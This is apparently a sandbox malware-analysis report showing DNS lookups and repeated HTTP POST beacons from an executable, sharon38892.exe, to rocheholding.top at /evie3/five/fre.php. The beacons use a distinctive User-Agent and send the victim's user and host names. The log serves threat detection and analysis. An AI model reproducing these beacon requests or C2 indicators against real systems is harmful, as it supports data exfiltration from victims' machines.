                      May 23, 2024 20:18:43.776977062 CEST8.8.8.8192.168.2.220xcbb6No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:44.719610929 CEST8.8.8.8192.168.2.220x25c0No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:44.719610929 CEST8.8.8.8192.168.2.220x25c0No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:45.617742062 CEST8.8.8.8192.168.2.220x6ef8No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:45.617742062 CEST8.8.8.8192.168.2.220x6ef8No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:46.510543108 CEST8.8.8.8192.168.2.220xbb0No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:46.510543108 CEST8.8.8.8192.168.2.220xbb0No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:47.433036089 CEST8.8.8.8192.168.2.220xbfd4No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:47.433036089 CEST8.8.8.8192.168.2.220xbfd4No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:48.350919962 CEST8.8.8.8192.168.2.220x66eNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:48.350919962 CEST8.8.8.8192.168.2.220x66eNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:49.158883095 CEST8.8.8.8192.168.2.220x9279No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:49.158883095 CEST8.8.8.8192.168.2.220x9279No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:50.054630041 CEST8.8.8.8192.168.2.220xaf87No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:50.054630041 CEST8.8.8.8192.168.2.220xaf87No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:51.078370094 CEST8.8.8.8192.168.2.220x1204No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:51.078370094 CEST8.8.8.8192.168.2.220x1204No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:52.378161907 CEST8.8.8.8192.168.2.220x3a9dNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:52.378161907 CEST8.8.8.8192.168.2.220x3a9dNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:53.335199118 CEST8.8.8.8192.168.2.220xcdeNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:53.335199118 CEST8.8.8.8192.168.2.220xcdeNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:54.304356098 CEST8.8.8.8192.168.2.220x96c9No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:54.304356098 CEST8.8.8.8192.168.2.220x96c9No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:55.217312098 CEST8.8.8.8192.168.2.220x1dcbNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:55.217312098 CEST8.8.8.8192.168.2.220x1dcbNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:56.082659960 CEST8.8.8.8192.168.2.220x3b1cNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:56.082659960 CEST8.8.8.8192.168.2.220x3b1cNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:56.896380901 CEST8.8.8.8192.168.2.220x1323No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:56.896380901 CEST8.8.8.8192.168.2.220x1323No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:57.784815073 CEST8.8.8.8192.168.2.220xd83dNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:57.784815073 CEST8.8.8.8192.168.2.220xd83dNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:58.585558891 CEST8.8.8.8192.168.2.220x741dNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:58.585558891 CEST8.8.8.8192.168.2.220x741dNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:59.513384104 CEST8.8.8.8192.168.2.220x96d3No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:59.513384104 CEST8.8.8.8192.168.2.220x96d3No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:00.417927027 CEST8.8.8.8192.168.2.220x5508No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:00.417927027 CEST8.8.8.8192.168.2.220x5508No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:01.357151985 CEST8.8.8.8192.168.2.220x8bb0No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:01.357151985 CEST8.8.8.8192.168.2.220x8bb0No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:02.176846981 CEST8.8.8.8192.168.2.220x857fNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:02.176846981 CEST8.8.8.8192.168.2.220x857fNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:03.309638977 CEST8.8.8.8192.168.2.220xee35No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:03.309638977 CEST8.8.8.8192.168.2.220xee35No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:04.219594955 CEST8.8.8.8192.168.2.220xde3No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:04.219594955 CEST8.8.8.8192.168.2.220xde3No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:05.125282049 CEST8.8.8.8192.168.2.220xc242No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:05.125282049 CEST8.8.8.8192.168.2.220xc242No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:06.057423115 CEST8.8.8.8192.168.2.220xa5d5No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:06.057423115 CEST8.8.8.8192.168.2.220xa5d5No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:07.011307001 CEST8.8.8.8192.168.2.220x955eNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:07.011307001 CEST8.8.8.8192.168.2.220x955eNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:07.881956100 CEST8.8.8.8192.168.2.220x3bdcNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:07.881956100 CEST8.8.8.8192.168.2.220x3bdcNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:08.846313000 CEST8.8.8.8192.168.2.220x5fdeNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:08.846313000 CEST8.8.8.8192.168.2.220x5fdeNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:09.912739038 CEST8.8.8.8192.168.2.220xa027No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:09.912739038 CEST8.8.8.8192.168.2.220xa027No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:10.733256102 CEST8.8.8.8192.168.2.220x6945No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:10.733256102 CEST8.8.8.8192.168.2.220x6945No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:11.668661118 CEST8.8.8.8192.168.2.220x1ac5No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:11.668661118 CEST8.8.8.8192.168.2.220x1ac5No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:12.589925051 CEST8.8.8.8192.168.2.220x9200No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:12.589925051 CEST8.8.8.8192.168.2.220x9200No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:13.391798019 CEST8.8.8.8192.168.2.220xe002No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:13.391798019 CEST8.8.8.8192.168.2.220xe002No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:14.269871950 CEST8.8.8.8192.168.2.220xdc3bNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:14.269871950 CEST8.8.8.8192.168.2.220xdc3bNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:15.177254915 CEST8.8.8.8192.168.2.220xc8bfNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:15.177254915 CEST8.8.8.8192.168.2.220xc8bfNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:15.998914003 CEST8.8.8.8192.168.2.220x1f8eNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:15.998914003 CEST8.8.8.8192.168.2.220x1f8eNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:16.873891115 CEST8.8.8.8192.168.2.220x3173No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:16.873891115 CEST8.8.8.8192.168.2.220x3173No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:17.645247936 CEST8.8.8.8192.168.2.220x9b3bNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:17.645247936 CEST8.8.8.8192.168.2.220x9b3bNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:18.432483912 CEST8.8.8.8192.168.2.220xaa28No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:19:18.432483912 CEST8.8.8.8192.168.2.220xaa28No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      • universalmovies.top
                      • rocheholding.top
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.2249164188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:35.132025003 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 176
                      Connection: close
                      May 23, 2024 20:17:35.171624899 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: 'ckav.ruAlbus141700ALBUS-PCk0DE4229FCF97F5879F50F8FD3QDi1K
                      May 23, 2024 20:17:35.880770922 CEST619INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6gJfvO7olfEsdyqt3RGG%2BL80oSkjC0dkl0pQDPrdA%2FOrqBRl824zYh%2FQlsYMOyTb1LhCVC2HJDcAJ7C3pkD4gvqSi%2B84qaGVYiCtS6gehR0uVH%2BdcmY70LhekTy3vlZxrwS"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b2d4e8542c4-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.2249165188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:36.624490023 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 176
                      Connection: close
                      May 23, 2024 20:17:36.664830923 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: 'ckav.ruAlbus141700ALBUS-PC+0DE4229FCF97F5879F50F8FD3DaHSF
                      May 23, 2024 20:17:37.356448889 CEST615INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Cx05J3EhhX%2FOS64qMqLws5JP%2BEUh3VGZct31FDQXRJvKx7kiOFrgsQf0a6%2FqaxSC8WAc4IgNUS3w8YZXOcd5Bv0017KpFQTBpNxqRY67ZT3FQBncncDxNDgt26dNdVM4GsM"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b3678c18cdd-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.2249166188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:38.077506065 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:38.127974987 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:38.840037107 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdpNFt46F1HF0%2BGP88bbvWo8Wo8ZOKgPopbyFeXlVP7lvxxjy11II5UA1hdYtSG4xCHka%2F2j8xNUiQpS58FkteOWw6wXfgaIhoHOS%2BpdsZrEQCxpwTvLy65XlkhFb2nXLzTl"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b3fbcbb8cba-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.2249167188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:39.511373997 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:39.548326015 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:40.474148989 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KWReV%2FS%2FEdrVyy5aWpznp0MnToUNd1b7OjNpheZorXyxJGnzNIBBj8KFNuC1DJFQgnlGcrL%2FQCAluFOmz8Orutys%2FNfFcl26EPkI%2FBLZ2rcvpcoJ119%2BNojt2d4BR5czoQS"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b486a644345-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.2249168188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:40.814233065 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:40.859951019 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:41.576291084 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhrS9S1Kc1L9QFPD8Oa8i4r5L2t7fskLt%2B0Y6B7SUCz%2FibpTrid6xUEleBFB%2Fc1QGsT3WoNRedHxmd0yBOEKyKke8QWjOZYT96DaO%2BPSuXh5Xb15n4y0loRE4osrRNfwHKXf"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b50ecf0179d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.2249169188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:42.120354891 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:42.170939922 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:42.919584990 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ziOK6F00JN8Iv0Q5k2W2so3cc%2Bl538lOy2UVbCCkkdTTWgC4THkNzxl6PAYKa3gvfWY4Pa6%2BM4e2Us0D1BR4Sp9NKE07r8jqN%2F9Z4XmuLzDSO04UvjzrDDzWdu5wOeYJb7C"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b593c6e330c-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.2249170188.114.97.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:43.183161974 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:43.233190060 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:43.932068110 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USAS47hLYJL19JqG82%2BuJ5n4LWYWKs2k3h2IlrSTcd4VANF8U63PubUaCAm4Ku0XP5h5tk4ANMk%2FjziAAX7MTYJA%2BQQLiBRoobM%2BpYsc96d4F3FpXcnJqyJFRDK4yyQRPmjN"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b5f98f272b7-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.2249171188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:44.106858969 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:44.162367105 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:44.893239975 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XP8Z0Vmp5YbtXny9k1gCdr8MPc6%2BqIsB60k1OhG4qGx2dM9PDV3RANOCkx7ZoTopeXLyAP6eYmQzxzxy8FBi%2FGT%2FvyPLuSmXiRppDDEhanjHjtw67HXWC9HVnqlS6PCPSst0"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870b657fddc3eb-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.2249172188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:17:45.155200958 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:17:45.203666925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:17:45.883692026 CEST619INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:17:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0S9DQhZ7kD1vRANZyNNLix3LteO8PLCYfRwmHPdWpAQpswfHdnPPXnUNhy54EeYkFa%2FfKpiXind6yUIf5KyUGrKdVoS20Q7UMMwkEOvgkexxcA8Yxv9dy5ZWDVwLMyat8YVr"}],"group":"cf-nel","max_age":604800}
